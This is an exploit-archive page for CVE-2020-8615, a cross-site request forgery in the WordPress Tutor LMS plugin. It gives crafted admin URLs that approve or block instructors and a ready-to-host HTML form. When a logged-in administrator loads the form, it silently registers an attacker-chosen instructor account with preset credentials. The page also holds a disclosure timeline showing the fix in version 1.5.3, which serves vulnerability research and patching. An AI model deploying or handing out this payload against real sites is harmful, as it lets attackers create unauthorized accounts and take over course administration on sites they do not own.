what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Tutor LMS 1.5.3 Cross Site Request Forgery

WordPress Tutor LMS 1.5.3 Cross Site Request Forgery
Posted Mar 2, 2020
Authored by Jinson Varghese Behanan

WordPress Tutor LMS plugin version 1.5.3 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2020-8615
SHA-256 | ceb7fad1bddca882cf8865660a2c2e9a841f52a147fd897d47001e0ab57a5343

WordPress Tutor LMS 1.5.3 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615

# 1. Description

# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses.
# An attacker can use CSRF to register themselves as an instructor or block other legit instructors.
# Consequently, if the option to create courses without admin approval is enabled on the plugin’s settings
# page, the attacker will be able to create courses directly as well. All WordPress websites
# using Tutor LMS version 1.5.2 and below are affected.

# 2. Proof of Concept

# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF
# attack to approve an attacker-controlled instructor account can be performed by having the admin
# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly,
# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked
# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.

# CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor
# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval.
# This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is
# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can
# be tricked into visiting the link and triggering the request to add an instructor.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://TARGET/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="add_new_instructor" />
<input type="hidden" name="first_name" value="John" />
<input type="hidden" name="last_name" value="Doe" />
<input type="hidden" name="user_login" value="jd_instructor" />
<input type="hidden" name="email" value="jd@TARGET" />
<input type="hidden" name="phone_number" value="1231231231" />
<input type="hidden" name="password" value="Pa$$w0rd!" />
<input type="hidden" name="password_confirmation" value="Pa$$w0rd!" />
<input type="hidden" name="tutor_profile_bio" value="Et tempore culpa n" />
<input type="hidden" name="action" value="tutor_add_instructor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

3. Timeline

Vulnerability reported to the Tutor LMS team – January 30, 2020.
Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close